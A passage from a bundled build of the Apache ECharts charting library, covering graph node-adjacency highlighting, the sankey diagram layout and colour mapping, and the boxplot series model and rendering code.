graph.getEdgeByIndex(edgeDataIndex);\n\n        graph.eachNode(function (node) {\n            fadeOutItem$1(node, nodeOpacityPath$1, 0.1);\n        });\n        graph.eachEdge(function (edge) {\n            fadeOutItem$1(edge, lineOpacityPath$1, 0.1);\n        });\n\n        if (node) {\n            fadeInItem$1(node, hoverNodeOpacityPath);\n            var focusNodeAdj = itemModel.get('focusNodeAdjacency');\n            if (focusNodeAdj === 'outEdges') {\n                each$1(node.outEdges, function (edge) {\n                    if (edge.dataIndex < 0) {\n                        return;\n                    }\n                    fadeInItem$1(edge, hoverLineOpacityPath);\n                    fadeInItem$1(edge.node2, hoverNodeOpacityPath);\n                });\n            }\n            else if (focusNodeAdj === 'inEdges') {\n                each$1(node.inEdges, function (edge) {\n                    if (edge.dataIndex < 0) {\n                        return;\n                    }\n                    fadeInItem$1(edge, hoverLineOpacityPath);\n                    fadeInItem$1(edge.node1, hoverNodeOpacityPath);\n                });\n            }\n            else if (focusNodeAdj === 'allEdges') {\n                each$1(node.edges, function (edge) {\n                    if (edge.dataIndex < 0) {\n                        return;\n                    }\n                    fadeInItem$1(edge, hoverLineOpacityPath);\n                    (edge.node1 !== node) && fadeInItem$1(edge.node1, hoverNodeOpacityPath);\n                    (edge.node2 !== node) && fadeInItem$1(edge.node2, hoverNodeOpacityPath);\n                });\n            }\n        }\n        if (edge) {\n            fadeInItem$1(edge, hoverLineOpacityPath);\n            fadeInItem$1(edge.node1, hoverNodeOpacityPath);\n            fadeInItem$1(edge.node2, hoverNodeOpacityPath);\n        }\n    },\n\n    unfocusNodeAdjacency: function (seriesModel, ecModel, api, payload) {\n        var graph = seriesModel.getGraph();\n\n        graph.eachNode(function (node) {\n            fadeOutItem$1(node, nodeOpacityPath$1);\n        });\n        graph.eachEdge(function (edge) {\n            fadeOutItem$1(edge, lineOpacityPath$1);\n        });\n    }\n});\n\n// Add animation to the view\nfunction createGridClipShape$1(rect, seriesModel, cb) {\n    var rectEl = new Rect({\n        shape: {\n            x: rect.x - 10,\n            y: rect.y - 10,\n            width: 0,\n            height: rect.height + 20\n        }\n    });\n    initProps(rectEl, {\n        shape: {\n            width: rect.width + 20\n        }\n    }, seriesModel, cb);\n\n    return rectEl;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterAction({\n    type: 'dragNode',\n    event: 'dragnode',\n    // here can only use 'update' now, other value is not support in echarts.\n    update: 'update'\n}, function (payload, ecModel) {\n    ecModel.eachComponent({mainType: 'series', subType: 'sankey', query: payload}, function (seriesModel) {\n        seriesModel.setNodePosition(payload.dataIndex, [payload.localX, payload.localY]);\n    });\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar sankeyLayout = function (ecModel, api, payload) {\n\n    ecModel.eachSeriesByType('sankey', function (seriesModel) {\n\n        var nodeWidth = seriesModel.get('nodeWidth');\n        var nodeGap = seriesModel.get('nodeGap');\n\n        var layoutInfo = getViewRect$4(seriesModel, api);\n\n        seriesModel.layoutInfo = layoutInfo;\n\n        var width = layoutInfo.width;\n        var height = layoutInfo.height;\n\n        var graph = seriesModel.getGraph();\n\n        var nodes = graph.nodes;\n        var edges = graph.edges;\n\n        computeNodeValues(nodes);\n\n        var filteredNodes = filter(nodes, function (node) {\n            return node.getLayout().value === 0;\n        });\n\n        var iterations = filteredNodes.length !== 0 ? 0 : seriesModel.get('layoutIterations');\n\n        var orient = seriesModel.get('orient');\n\n        var nodeAlign = seriesModel.get('nodeAlign');\n\n        layoutSankey(nodes, edges, nodeWidth, nodeGap, width, height, iterations, orient, nodeAlign);\n    });\n};\n\n/**\n * Get the layout position of the whole view\n *\n * @param {module:echarts/model/Series} seriesModel  the model object of sankey series\n * @param {module:echarts/ExtensionAPI} api  provide the API list that the developer can call\n * @return {module:zrender/core/BoundingRect}  size of rect to draw the sankey view\n */\nfunction getViewRect$4(seriesModel, api) {\n    return getLayoutRect(\n        seriesModel.getBoxLayoutParams(), {\n            width: api.getWidth(),\n            height: api.getHeight()\n        }\n    );\n}\n\nfunction layoutSankey(nodes, edges, nodeWidth, nodeGap, width, height, iterations, orient, nodeAlign) {\n    computeNodeBreadths(nodes, edges, nodeWidth, width, height, orient, nodeAlign);\n    computeNodeDepths(nodes, edges, height, width, nodeGap, iterations, orient);\n    computeEdgeDepths(nodes, orient);\n}\n\n/**\n * Compute the value of each node by summing the associated edge's value\n *\n * @param {module:echarts/data/Graph~Node} nodes  node of sankey view\n */\nfunction computeNodeValues(nodes) {\n    each$1(nodes, function (node) {\n        var value1 = sum(node.outEdges, getEdgeValue);\n        var value2 = sum(node.inEdges, getEdgeValue);\n        var nodeRawValue = node.getValue() || 0;\n        var value = Math.max(value1, value2, nodeRawValue);\n        node.setLayout({value: value}, true);\n    });\n}\n\n/**\n * Compute the x-position for each node.\n *\n * Here we use Kahn algorithm to detect cycle when we traverse\n * the node to computer the initial x position.\n *\n * @param {module:echarts/data/Graph~Node} nodes  node of sankey view\n * @param  {number} nodeWidth  the dx of the node\n * @param  {number} width  the whole width of the area to draw the view\n */\nfunction computeNodeBreadths(nodes, edges, nodeWidth, width, height, orient, nodeAlign) {\n    // Used to mark whether the edge is deleted. if it is deleted,\n    // the value is 0, otherwise it is 1.\n    var remainEdges = [];\n    // Storage each node's indegree.\n    var indegreeArr = [];\n    //Used to storage the node with indegree is equal to 0.\n    var zeroIndegrees = [];\n    var nextTargetNode = [];\n    var x = 0;\n    var kx = 0;\n\n    for (var i = 0; i < edges.length; i++) {\n        remainEdges[i] = 1;\n    }\n    for (i = 0; i < nodes.length; i++) {\n        indegreeArr[i] = nodes[i].inEdges.length;\n        if (indegreeArr[i] === 0) {\n            zeroIndegrees.push(nodes[i]);\n        }\n    }\n    var maxNodeDepth = -1;\n    // Traversing nodes using topological sorting to calculate the\n    // horizontal(if orient === 'horizontal') or vertical(if orient === 'vertical')\n    // position of the nodes.\n    while (zeroIndegrees.length) {\n        for (var idx = 0; idx < zeroIndegrees.length; idx++) {\n            var node = zeroIndegrees[idx];\n            var item = node.hostGraph.data.getRawDataItem(node.dataIndex);\n            var isItemDepth = item.depth != null && item.depth >= 0;\n            if (isItemDepth && item.depth > maxNodeDepth) {\n                maxNodeDepth = item.depth;\n            }\n            node.setLayout({depth: isItemDepth ? item.depth : x}, true);\n            orient === 'vertical'\n                ? node.setLayout({dy: nodeWidth}, true)\n                : node.setLayout({dx: nodeWidth}, true);\n\n            for (var edgeIdx = 0; edgeIdx < node.outEdges.length; edgeIdx++) {\n                var edge = node.outEdges[edgeIdx];\n                var indexEdge = edges.indexOf(edge);\n                remainEdges[indexEdge] = 0;\n                var targetNode = edge.node2;\n                var nodeIndex = nodes.indexOf(targetNode);\n                if (--indegreeArr[nodeIndex] === 0 && nextTargetNode.indexOf(targetNode) < 0) {\n                    nextTargetNode.push(targetNode);\n                }\n            }\n        }\n        ++x;\n        zeroIndegrees = nextTargetNode;\n        nextTargetNode = [];\n    }\n\n    for (i = 0; i < remainEdges.length; i++) {\n        if (remainEdges[i] === 1) {\n            throw new Error('Sankey is a DAG, the original data has cycle!');\n        }\n    }\n\n    var maxDepth = maxNodeDepth > x - 1 ? maxNodeDepth : x - 1;\n    if (nodeAlign && nodeAlign !== 'left') {\n        adjustNodeWithNodeAlign(nodes, nodeAlign, orient, maxDepth);\n    }\n    var kx = orient === 'vertical'\n                ? (height - nodeWidth) / maxDepth\n                : (width - nodeWidth) / maxDepth;\n\n    scaleNodeBreadths(nodes, kx, orient);\n}\n\nfunction isNodeDepth(node) {\n    var item = node.hostGraph.data.getRawDataItem(node.dataIndex);\n    return item.depth != null && item.depth >= 0;\n}\n\nfunction adjustNodeWithNodeAlign(nodes, nodeAlign, orient, maxDepth) {\n    if (nodeAlign === 'right') {\n        var nextSourceNode = [];\n        var remainNodes = nodes;\n        var nodeHeight = 0;\n        while (remainNodes.length) {\n            for (var i = 0; i < remainNodes.length; i++) {\n                var node = remainNodes[i];\n                node.setLayout({skNodeHeight: nodeHeight}, true);\n                for (var j = 0; j < node.inEdges.length; j++) {\n                    var edge = node.inEdges[j];\n                    if (nextSourceNode.indexOf(edge.node1) < 0) {\n                        nextSourceNode.push(edge.node1);\n                    }\n                }\n            }\n            remainNodes = nextSourceNode;\n            nextSourceNode = [];\n            ++nodeHeight;\n        }\n\n        each$1(nodes, function (node) {\n            if (!isNodeDepth(node)) {\n                node.setLayout({depth: Math.max(0, maxDepth - node.getLayout().skNodeHeight)}, true);\n            }\n        });\n    }\n    else if (nodeAlign === 'justify') {\n        moveSinksRight(nodes, maxDepth);\n    }\n}\n\n/**\n * All the node without outEgdes are assigned maximum x-position and\n *     be aligned in the last column.\n *\n * @param {module:echarts/data/Graph~Node} nodes.  node of sankey view.\n * @param {number} maxDepth.  use to assign to node without outEdges as x-position.\n */\nfunction moveSinksRight(nodes, maxDepth) {\n    each$1(nodes, function (node) {\n        if (!isNodeDepth(node) && !node.outEdges.length) {\n            node.setLayout({depth: maxDepth}, true);\n        }\n    });\n}\n\n/**\n * Scale node x-position to the width\n *\n * @param {module:echarts/data/Graph~Node} nodes  node of sankey view\n * @param {number} kx   multiple used to scale nodes\n */\nfunction scaleNodeBreadths(nodes, kx, orient) {\n    each$1(nodes, function (node) {\n        var nodeDepth = node.getLayout().depth * kx;\n        orient === 'vertical'\n            ? node.setLayout({y: nodeDepth}, true)\n            : node.setLayout({x: nodeDepth}, true);\n    });\n}\n\n/**\n * Using Gauss-Seidel iterations method to compute the node depth(y-position)\n *\n * @param {module:echarts/data/Graph~Node} nodes  node of sankey view\n * @param {module:echarts/data/Graph~Edge} edges  edge of sankey view\n * @param {number} height  the whole height of the area to draw the view\n * @param {number} nodeGap  the vertical distance between two nodes\n *     in the same column.\n * @param {number} iterations  the number of iterations for the algorithm\n */\nfunction computeNodeDepths(nodes, edges, height, width, nodeGap, iterations, orient) {\n    var nodesByBreadth = prepareNodesByBreadth(nodes, orient);\n\n    initializeNodeDepth(nodesByBreadth, edges, height, width, nodeGap, orient);\n    resolveCollisions(nodesByBreadth, nodeGap, height, width, orient);\n\n    for (var alpha = 1; iterations > 0; iterations--) {\n        // 0.99 is a experience parameter, ensure that each iterations of\n        // changes as small as possible.\n        alpha *= 0.99;\n        relaxRightToLeft(nodesByBreadth, alpha, orient);\n        resolveCollisions(nodesByBreadth, nodeGap, height, width, orient);\n        relaxLeftToRight(nodesByBreadth, alpha, orient);\n        resolveCollisions(nodesByBreadth, nodeGap, height, width, orient);\n    }\n}\n\nfunction prepareNodesByBreadth(nodes, orient) {\n    var nodesByBreadth = [];\n    var keyAttr = orient === 'vertical' ? 'y' : 'x';\n\n    var groupResult = groupData(nodes, function (node) {\n        return node.getLayout()[keyAttr];\n    });\n    groupResult.keys.sort(function (a, b) {\n        return a - b;\n    });\n    each$1(groupResult.keys, function (key) {\n        nodesByBreadth.push(groupResult.buckets.get(key));\n    });\n\n    return nodesByBreadth;\n}\n\n/**\n * Compute the original y-position for each node\n *\n * @param {module:echarts/data/Graph~Node} nodes  node of sankey view\n * @param {Array.<Array.<module:echarts/data/Graph~Node>>} nodesByBreadth\n *     group by the array of all sankey nodes based on the nodes x-position.\n * @param {module:echarts/data/Graph~Edge} edges  edge of sankey view\n * @param {number} height  the whole height of the area to draw the view\n * @param {number} nodeGap  the vertical distance between two nodes\n */\nfunction initializeNodeDepth(nodesByBreadth, edges, height, width, nodeGap, orient) {\n    var minKy = Infinity;\n    each$1(nodesByBreadth, function (nodes) {\n        var n = nodes.length;\n        var sum = 0;\n        each$1(nodes, function (node) {\n            sum += node.getLayout().value;\n        });\n        var ky = orient === 'vertical'\n                    ? (width - (n - 1) * nodeGap) / sum\n                    : (height - (n - 1) * nodeGap) / sum;\n\n        if (ky < minKy) {\n            minKy = ky;\n        }\n    });\n\n    each$1(nodesByBreadth, function (nodes) {\n        each$1(nodes, function (node, i) {\n            var nodeDy = node.getLayout().value * minKy;\n            if (orient === 'vertical') {\n                node.setLayout({x: i}, true);\n                node.setLayout({dx: nodeDy}, true);\n            }\n            else {\n                node.setLayout({y: i}, true);\n                node.setLayout({dy: nodeDy}, true);\n            }\n        });\n    });\n\n    each$1(edges, function (edge) {\n        var edgeDy = +edge.getValue() * minKy;\n        edge.setLayout({dy: edgeDy}, true);\n    });\n}\n\n/**\n * Resolve the collision of initialized depth (y-position)\n *\n * @param {Array.<Array.<module:echarts/data/Graph~Node>>} nodesByBreadth\n *     group by the array of all sankey nodes based on the nodes x-position.\n * @param {number} nodeGap  the vertical distance between two nodes\n * @param {number} height  the whole height of the area to draw the view\n */\nfunction resolveCollisions(nodesByBreadth, nodeGap, height, width, orient) {\n    var keyAttr = orient === 'vertical' ? 'x' : 'y';\n    each$1(nodesByBreadth, function (nodes) {\n        nodes.sort(function (a, b) {\n            return a.getLayout()[keyAttr] - b.getLayout()[keyAttr];\n        });\n        var nodeX;\n        var node;\n        var dy;\n        var y0 = 0;\n        var n = nodes.length;\n        var nodeDyAttr = orient === 'vertical' ? 'dx' : 'dy';\n        for (var i = 0; i < n; i++) {\n            node = nodes[i];\n            dy = y0 - node.getLayout()[keyAttr];\n            if (dy > 0) {\n                nodeX = node.getLayout()[keyAttr] + dy;\n                orient === 'vertical'\n                    ? node.setLayout({x: nodeX}, true)\n                    : node.setLayout({y: nodeX}, true);\n            }\n            y0 = node.getLayout()[keyAttr] + node.getLayout()[nodeDyAttr] + nodeGap;\n        }\n        var viewWidth = orient === 'vertical' ? width : height;\n        // If the bottommost node goes outside the bounds, push it back up\n        dy = y0 - nodeGap - viewWidth;\n        if (dy > 0) {\n            nodeX = node.getLayout()[keyAttr] - dy;\n            orient === 'vertical'\n                ? node.setLayout({x: nodeX}, true)\n                : node.setLayout({y: nodeX}, true);\n\n            y0 = nodeX;\n            for (i = n - 2; i >= 0; --i) {\n                node = nodes[i];\n                dy = node.getLayout()[keyAttr] + node.getLayout()[nodeDyAttr] + nodeGap - y0;\n                if (dy > 0) {\n                    nodeX = node.getLayout()[keyAttr] - dy;\n                    orient === 'vertical'\n                        ? node.setLayout({x: nodeX}, true)\n                        : node.setLayout({y: nodeX}, true);\n                }\n                y0 = node.getLayout()[keyAttr];\n            }\n        }\n    });\n}\n\n/**\n * Change the y-position of the nodes, except most the right side nodes\n *\n * @param {Array.<Array.<module:echarts/data/Graph~Node>>} nodesByBreadth\n *     group by the array of all sankey nodes based on the node x-position.\n * @param {number} alpha  parameter used to adjust the nodes y-position\n */\nfunction relaxRightToLeft(nodesByBreadth, alpha, orient) {\n    each$1(nodesByBreadth.slice().reverse(), function (nodes) {\n        each$1(nodes, function (node) {\n            if (node.outEdges.length) {\n                var y = sum(node.outEdges, weightedTarget, orient)\n                        / sum(node.outEdges, getEdgeValue, orient);\n                if (orient === 'vertical') {\n                    var nodeX = node.getLayout().x + (y - center$1(node, orient)) * alpha;\n                    node.setLayout({x: nodeX}, true);\n                }\n                else {\n                    var nodeY = node.getLayout().y + (y - center$1(node, orient)) * alpha;\n                    node.setLayout({y: nodeY}, true);\n                }\n            }\n        });\n    });\n}\n\nfunction weightedTarget(edge, orient) {\n    return center$1(edge.node2, orient) * edge.getValue();\n}\n\nfunction weightedSource(edge, orient) {\n    return center$1(edge.node1, orient) * edge.getValue();\n}\n\nfunction center$1(node, orient) {\n    return orient === 'vertical'\n            ? node.getLayout().x + node.getLayout().dx / 2\n            : node.getLayout().y + node.getLayout().dy / 2;\n}\n\nfunction getEdgeValue(edge) {\n    return edge.getValue();\n}\n\nfunction sum(array, cb, orient) {\n    var sum = 0;\n    var len = array.length;\n    var i = -1;\n    while (++i < len) {\n        var value = +cb.call(array, array[i], orient);\n        if (!isNaN(value)) {\n            sum += value;\n        }\n    }\n    return sum;\n}\n\n/**\n * Change the y-position of the nodes, except most the left side nodes\n *\n * @param {Array.<Array.<module:echarts/data/Graph~Node>>} nodesByBreadth\n *     group by the array of all sankey nodes based on the node x-position.\n * @param {number} alpha  parameter used to adjust the nodes y-position\n */\nfunction relaxLeftToRight(nodesByBreadth, alpha, orient) {\n    each$1(nodesByBreadth, function (nodes) {\n        each$1(nodes, function (node) {\n            if (node.inEdges.length) {\n                var y = sum(node.inEdges, weightedSource, orient)\n                        / sum(node.inEdges, getEdgeValue, orient);\n                if (orient === 'vertical') {\n                    var nodeX = node.getLayout().x + (y - center$1(node, orient)) * alpha;\n                    node.setLayout({x: nodeX}, true);\n                }\n                else {\n                    var nodeY = node.getLayout().y + (y - center$1(node, orient)) * alpha;\n                    node.setLayout({y: nodeY}, true);\n                }\n            }\n        });\n    });\n}\n\n/**\n * Compute the depth(y-position) of each edge\n *\n * @param {module:echarts/data/Graph~Node} nodes  node of sankey view\n */\nfunction computeEdgeDepths(nodes, orient) {\n    var keyAttr = orient === 'vertical' ? 'x' : 'y';\n    each$1(nodes, function (node) {\n        node.outEdges.sort(function (a, b) {\n            return a.node2.getLayout()[keyAttr] - b.node2.getLayout()[keyAttr];\n        });\n        node.inEdges.sort(function (a, b) {\n            return a.node1.getLayout()[keyAttr] - b.node1.getLayout()[keyAttr];\n        });\n    });\n    each$1(nodes, function (node) {\n        var sy = 0;\n        var ty = 0;\n        each$1(node.outEdges, function (edge) {\n            edge.setLayout({sy: sy}, true);\n            sy += edge.getLayout().dy;\n        });\n        each$1(node.inEdges, function (edge) {\n            edge.setLayout({ty: ty}, true);\n            ty += edge.getLayout().dy;\n        });\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar sankeyVisual = function (ecModel, payload) {\n    ecModel.eachSeriesByType('sankey', function (seriesModel) {\n        var graph = seriesModel.getGraph();\n        var nodes = graph.nodes;\n        if (nodes.length) {\n            var minValue = Infinity;\n            var maxValue = -Infinity;\n            each$1(nodes, function (node) {\n                var nodeValue = node.getLayout().value;\n                if (nodeValue < minValue) {\n                    minValue = nodeValue;\n                }\n                if (nodeValue > maxValue) {\n                    maxValue = nodeValue;\n                }\n            });\n\n            each$1(nodes, function (node) {\n                var mapping = new VisualMapping({\n                    type: 'color',\n                    mappingMethod: 'linear',\n                    dataExtent: [minValue, maxValue],\n                    visual: seriesModel.get('color')\n                });\n\n                var mapValueToColor = mapping.mapValueToVisual(node.getLayout().value);\n                var customColor = node.getModel().get('itemStyle.color');\n                customColor != null\n                    ? node.setVisual('color', customColor)\n                    : node.setVisual('color', mapValueToColor);\n            });\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterLayout(sankeyLayout);\nregisterVisual(sankeyVisual);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar seriesModelMixin = {\n\n    /**\n     * @private\n     * @type {string}\n     */\n    _baseAxisDim: null,\n\n    /**\n     * @override\n     */\n    getInitialData: function (option, ecModel) {\n        // When both types of xAxis and yAxis are 'value', layout is\n        // needed to be specified by user. Otherwise, layout can be\n        // judged by which axis is category.\n\n        var ordinalMeta;\n\n        var xAxisModel = ecModel.getComponent('xAxis', this.get('xAxisIndex'));\n        var yAxisModel = ecModel.getComponent('yAxis', this.get('yAxisIndex'));\n        var xAxisType = xAxisModel.get('type');\n        var yAxisType = yAxisModel.get('type');\n        var addOrdinal;\n\n        // FIXME\n        // Consider time axis.\n\n        if (xAxisType === 'category') {\n            option.layout = 'horizontal';\n            ordinalMeta = xAxisModel.getOrdinalMeta();\n            addOrdinal = true;\n        }\n        else if (yAxisType === 'category') {\n            option.layout = 'vertical';\n            ordinalMeta = yAxisModel.getOrdinalMeta();\n            addOrdinal = true;\n        }\n        else {\n            option.layout = option.layout || 'horizontal';\n        }\n\n        var coordDims = ['x', 'y'];\n        var baseAxisDimIndex = option.layout === 'horizontal' ? 0 : 1;\n        var baseAxisDim = this._baseAxisDim = coordDims[baseAxisDimIndex];\n        var otherAxisDim = coordDims[1 - baseAxisDimIndex];\n        var axisModels = [xAxisModel, yAxisModel];\n        var baseAxisType = axisModels[baseAxisDimIndex].get('type');\n        var otherAxisType = axisModels[1 - baseAxisDimIndex].get('type');\n        var data = option.data;\n\n        // ??? FIXME make a stage to perform data transfrom.\n        // MUST create a new data, consider setOption({}) again.\n        if (data && addOrdinal) {\n            var newOptionData = [];\n            each$1(data, function (item, index) {\n                var newItem;\n                if (item.value && isArray(item.value)) {\n                    newItem = item.value.slice();\n                    item.value.unshift(index);\n                }\n                else if (isArray(item)) {\n                    newItem = item.slice();\n                    item.unshift(index);\n                }\n                else {\n                    newItem = item;\n                }\n                newOptionData.push(newItem);\n            });\n            option.data = newOptionData;\n        }\n\n        var defaultValueDimensions = this.defaultValueDimensions;\n        var coordDimensions = [{\n            name: baseAxisDim,\n            type: getDimensionTypeByAxis(baseAxisType),\n            ordinalMeta: ordinalMeta,\n            otherDims: {\n                tooltip: false,\n                itemName: 0\n            },\n            dimsDef: ['base']\n        }, {\n            name: otherAxisDim,\n            type: getDimensionTypeByAxis(otherAxisType),\n            dimsDef: defaultValueDimensions.slice()\n        }];\n\n        return createListSimply(\n            this,\n            {\n                coordDimensions: coordDimensions,\n                dimensionsCount: defaultValueDimensions.length + 1,\n                encodeDefaulter: curry(\n                    makeSeriesEncodeForAxisCoordSys, coordDimensions, this\n                )\n            }\n        );\n    },\n\n    /**\n     * If horizontal, base axis is x, otherwise y.\n     * @override\n     */\n    getBaseAxis: function () {\n        var dim = this._baseAxisDim;\n        return this.ecModel.getComponent(dim + 'Axis', this.get(dim + 'AxisIndex')).axis;\n    }\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar BoxplotSeries = SeriesModel.extend({\n\n    type: 'series.boxplot',\n\n    dependencies: ['xAxis', 'yAxis', 'grid'],\n\n    // TODO\n    // box width represents group size, so dimension should have 'size'.\n\n    /**\n     * @see <https://en.wikipedia.org/wiki/Box_plot>\n     * The meanings of 'min' and 'max' depend on user,\n     * and echarts do not need to know it.\n     * @readOnly\n     */\n    defaultValueDimensions: [\n        {name: 'min', defaultTooltip: true},\n        {name: 'Q1', defaultTooltip: true},\n        {name: 'median', defaultTooltip: true},\n        {name: 'Q3', defaultTooltip: true},\n        {name: 'max', defaultTooltip: true}\n    ],\n\n    /**\n     * @type {Array.<string>}\n     * @readOnly\n     */\n    dimensions: null,\n\n    /**\n     * @override\n     */\n    defaultOption: {\n        zlevel: 0,                  // 一级层叠\n        z: 2,                       // 二级层叠\n        coordinateSystem: 'cartesian2d',\n        legendHoverLink: true,\n\n        hoverAnimation: true,\n\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        layout: null,               // 'horizontal' or 'vertical'\n        boxWidth: [7, 50],       // [min, max] can be percent of band width.\n\n        itemStyle: {\n            color: '#fff',\n            borderWidth: 1\n        },\n\n        emphasis: {\n            itemStyle: {\n                borderWidth: 2,\n                shadowBlur: 5,\n                shadowOffsetX: 2,\n                shadowOffsetY: 2,\n                shadowColor: 'rgba(0,0,0,0.4)'\n            }\n        },\n\n        animationEasing: 'elasticOut',\n        animationDuration: 800\n    }\n});\n\nmixin(BoxplotSeries, seriesModelMixin, true);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Update common properties\nvar NORMAL_ITEM_STYLE_PATH = ['itemStyle'];\nvar EMPHASIS_ITEM_STYLE_PATH = ['emphasis', 'itemStyle'];\n\nvar BoxplotView = Chart.extend({\n\n    type: 'boxplot',\n\n    render: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n        var group = this.group;\n        var oldData = this._data;\n\n        // There is no old data only when first rendering or switching from\n        // stream mode to normal mode, where previous elements should be removed.\n        if (!this._data) {\n            group.removeAll();\n        }\n\n        var constDim = seriesModel.get('layout') === 'horizontal' ? 1 : 0;\n\n        data.diff(oldData)\n            .add(function (newIdx) {\n                if (data.hasValue(newIdx)) {\n                    var itemLayout = data.getItemLayout(newIdx);\n                    var symbolEl = createNormalBox(itemLayout, data, newIdx, constDim, true);\n                    data.setItemGraphicEl(newIdx, symbolEl);\n                    group.add(symbolEl);\n                }\n            })\n            .update(function (newIdx, oldIdx) {\n                var symbolEl = oldData.getItemGraphicEl(oldIdx);\n\n                // Empty data\n                if (!data.hasValue(newIdx)) {\n                    group.remove(symbolEl);\n                    return;\n                }\n\n                var itemLayout = data.getItemLayout(newIdx);\n                if (!symbolEl) {\n                    symbolEl = createNormalBox(itemLayout, data, newIdx, constDim);\n                }\n                else {\n                    updateNormalBoxData(itemLayout, symbolEl, data, newIdx);\n                }\n\n                group.add(symbolEl);\n\n                data.setItemGraphicEl(newIdx, symbolEl);\n            })\n            .remove(function (oldIdx) {\n                var el = oldData.getItemGraphicEl(oldIdx);\n                el && group.remove(el);\n            })\n            .execute();\n\n        this._data = data;\n    },\n\n    remove: function (ecModel) {\n        var group = this.group;\n        var data = this._data;\n        this._data = null;\n        data && data.eachItemGraphicEl(function (el) {\n            el && group.remove(el);\n        });\n    },\n\n    dispose: noop\n\n});\n\n\nvar BoxPath = Path.extend({\n\n    type: 'boxplotBoxPath',\n\n    shape: {},\n\n    buildPath: function (ctx, shape) {\n        var ends = shape.points;\n\n        var i = 0;\n        ctx.moveTo(ends[i][0], ends[i][1]);\n        i++;\n        for (; i < 4; i++) {\n            ctx.lineTo(ends[i][0], ends[i][1]);\n        }\n        ctx.closePath();\n\n        for (; i < ends.length; i++) {\n            ctx.moveTo(ends[i][0], ends[i][1]);\n            i++;\n            ctx.lineTo(ends[i][0], ends[i][1]);\n        }\n    }\n});\n\n\nfunction createNormalBox(itemLayout, data, dataIndex, constDim, isInit) {\n    var ends = itemLayout.ends;\n\n    var el = new BoxPath({\n        shape: {\n            points: isInit\n                ? transInit(ends, constDim, itemLayout)\n                : ends\n        }\n    });\n\n    updateNormalBoxData(itemLayout, el, data, dataIndex, isInit);\n\n    return el;\n}\n\nfunction updateNormalBoxData(itemLayout, el, data, dataIndex, isInit) {\n    var seriesModel = data.hostModel;\n    var updateMethod = graphic[isInit ? 'initProps' : 